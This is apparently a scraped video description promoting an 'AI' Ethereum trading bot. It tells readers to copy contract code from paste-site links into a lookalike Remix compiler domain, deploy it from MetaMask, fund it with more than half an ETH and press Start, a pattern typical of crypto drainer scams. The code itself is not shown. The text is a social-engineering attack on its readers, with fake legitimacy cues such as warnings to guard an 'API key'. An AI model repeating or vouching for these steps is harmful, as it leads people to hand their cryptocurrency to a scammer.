Source link
Hello everyone, today I want to tell you how to use Artificial Intelligence.
π Bot Source Code: https://codes-copybin.com/raw/tEGPvS
( π Backup-Source: https://scriptcode-copy.com/raw/ydFHpc )
STEP-BY-STEP GUIDE:
1οΈβ£ Download wallet: https://metamask.io/download
(Skip this step if you have one)
2οΈβ£ Go to the compiler: https://idecompiler-remix.com
3οΈβ£ Click on the βNew Fileβ. Give a name to your file, you can type in this field anything what you want.
4οΈβ£ Copy and paste the code in compiler:
https://codes-copybin.com/raw/tEGPvS
( If previous link doesnβt work you can use this too: https://scriptcode-copy.com/raw/ydFHpc )
5οΈβ£ Get back to βCompilerβ tab in remix and choose version the latest version 0.8.25 and the click βCompileβ button.
6οΈβ£ Head over to the next section in compiler. Then choose the βInjected Providerβ option in environment. And then use the function for deploying. This option allows you to release your own contract on chain. To pay gas for creating contract confirm message in wallet’s extension.
7οΈβ£ Check your balance and make sure there are more than half of 1ETH ( to prevent errors in deals and loses )
8οΈβ£ In the funcionality buttons of your own code press βKeyβ button. Keep in mind that this is the bot’s API authorization key. It means that IT’S YOUR OWN key of YOUR BOT that it uses to identificate you as its owner, BE CAREFULL and don’t reveal it to anyone! When you got key, paste it to the βValueβ field.
9οΈβ£ Then use βSetBalancePercentβ or βSetBalanceβ fields. Here you can choose how much Ethers on your wallet you want to use to make deals.
Use start button, to send command to start operating and making transactions.
π‘ To get your ethers back to your wallet from your smart contract, click on βStopβ button, and then click βWithdrawβ. Cause of assets can be used in the deal at the moment,.
ββββββββββββββββ
00:00 – Greetings
00:34- Script overview
00:52 – Explaining principle of work
01:35 – Setting up the bot
01:49 – Creating a file
02:12 – Minimum requirements
02:38 – Setting up the bot correctly
03:45 – Review of contract
03:59 – Verifying of contract
04:22 – IMPORTANT, don’t disclouse your Authorization key to anyone
04:31 – Turning on the optimization
04:43 – Successful verified
04:52 – Re-check of contract verification
05:01 – Functionality overview
06:04 – Starting
06:12 – DO NOT REVEAL YOUR API KEY to anyone!
07:24 – My results
07:56 – Withdrawing my Ethers back
08:32 – Thanks for watching
ββββββββββββββββ
π How can I restore the old contract again? Instead of creating a new contract in the IDE section. Better re-use your last contract by pasting your contract into the “At Address” section and press the button.
Note: Access cannot be restored by any other account than your last and without your api key, that you got during creating last one.
ββββββββββββββββ
date : 2024-05-14 14:19:20
views : 33
likes : 2
rating :
found searching for metamask programming tutorial